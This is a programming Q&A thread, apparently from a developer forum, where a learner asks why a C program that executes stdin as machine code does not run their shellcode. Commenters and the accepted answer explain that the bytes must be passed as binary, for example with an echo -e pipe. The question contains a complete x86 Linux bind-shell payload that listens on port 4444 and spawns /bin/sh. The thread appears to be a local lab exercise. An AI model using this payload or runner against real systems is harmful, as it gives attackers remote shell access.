# Program doesn't respond to the shell code passed to it

Tags: c, exploit, shellcode

I have a small c program on my local environment. This program receives a payload and outputs it.

```
#include <stdio.h>
#include <stdlib.h>
int main(int argc,char* argv[])
{
   char buffer[1025]; 
   memset(buffer,0,1025);
   fread(buffer,1,1024,stdin);
   int(*f)() = (int(*)())buffer;
   f();
   return 0;
}
```

### My work

I tried passing 1024 characters and then a shell code but it doesn't do anything.

I passed `"A"x1204` and then the below shell written code

```
\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x43\x68\xff\x02\x11\x5C\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80
```

Does anyone have any hint if I am doing it wrong.

Comment: where is your function `f` definition?

Comment: Is `"A"x1204` typo of `"A"x1024`?

Comment: Try removing the `"A"` s. Otherwise, your program will read the `"A"`s and it will fill the buffer, so it won't read the shell code.

Comment: Also, is the actual shell code binary, not the string containing many `\ `s?

Comment: @MikeCAT I tried passing only the shell code without "A"s, but still the same, it doesn't respond. I also tried using gdb, I do not get segmentation fault even though If I pass n number of "A"s

Comment: @artm `f` is a pointer to functon and it will point at where the input will be stored. `f();` will execute the input as machine language unless the OS or CPU refuse it.

Comment: @TechJ Which OS do you use to run this program on?

Comment: @MikeCAT  I am using Kali linux 32-bit

Comment: Use your debugger and into the assembly code.

Comment: It looks like you are jumping to the address of buffer, however buffer contains the 1024 characters of padding NOT the shell code.  Do you not need to jump to buffer + 1024?

Comment: @gareththegeek  correct I am using stdin, is there another way to exploit it.

Comment: It looks like you're trying to perform a buffer overflow exploit (hinted at by the "A":s and the buffer size) without actually overflowing a buffer.

Comment: @molbdnilo I didn't get you, do you mean I try only A 1024 times without shell code

Comment: @TechJ I mean that you're writing 1024 'A's into a properly terminated 1025-char buffer and ignore the rest of the input. Then you try to execute from the beginning of the buffer (which only contains 1024 `'A'`:s and a zero). The 1024 'A's are pointless unless you're trying to overflow a buffer smaller than that.

Comment: @molbdnilo  I tried AAAA.........AAAAA0  (means 1024 A and 0) but its same.

Comment: @molbdnilo I tried the same from metasploit, and didn't pass any payload and I was able to get the shell. But its strange how did it worked.

Answer (score 2, accepted):

`stdin` accepts `ASCII` text, not escaped `C` string. The buffer will contain then:

```
5c 78 36 61 5c 78 36 36 5c 78 35 38 5c 78 36 61 5c 78 30 31 5c 78 35 62 5c 78 39 39 5c 78 35 32 5c 78 35 33 5c 78 36 61 5c 78 30 32 5c 78 38 39 5c 78 65 31 5c 78 63 64 5c 78 38 30 5c 78 35 32 5c 78 34 33 5c 78 36 38 5c 78 66 66 5c 78 30 32 5c 78 31 31 5c 78 35 43 5c 78 38 39 5c 78 65 31 5c 78 36 61 5c 78 31 30 5c 78 35 31 5c 78 35 30 5c 78 38 39 5c 78 65 31 5c 78 38 39 5c 78 63 36 5c 78 62 30 5c 78 36 36 5c 78 63 64 5c 78 38 30 5c 78 34 33 5c 78 34 33 5c 78 62 30 5c 78 36 36 5c 78 63 64 5c 78 38 30 5c 78 35 32 5c 78 35 36 5c 78 38 39 5c 78 65 31 5c 78 34 33 5c 78 62 30 5c 78 36 36 5c 78 63 64 5c 78 38 30 5c 78 38 39 5c 78 64 39 5c 78 38 39 5c 78 63 33 5c 78 62 30 5c 78 33 66 5c 78 34 39 5c 78 63 64 5c 78 38 30 5c 78 34 31 5c 78 65 32 5c 78 66 38 5c 78 35 32 5c 78 36 38 5c 78 36 65 5c 78 32 66 5c 78 37 33 5c 78 36 38 5c 78 36 38 5c 78 32 66 5c 78 32 66 5c 78 36 32 5c 78 36 39 5c 78 38 39 5c 78 65 33 5c 78 35 32 5c 78 35 33 5c 78 38 39 5c 78 65 31 5c 78 62 30 5c 78 30 62 5c 78 63 64 5c 78 38 30
```

To pass an escaped string as a binary data `echo` can be used:

```
echo -n -e "\x6a\x66\x58\x6a\x01\x5b\x99" | a.out
```

Comment: I tried the string that you provided but still its the same, does't show any output

Comment: @TechJ Do not use the string. use **binary**.

Comment: I am not able to get you, how can I pass the binary values in stdin. Sorry for asking this but I am unaware of how to do so.

Comment: 1. save the code to pass to a file. 2. use redirect to have the program read the file from stdin.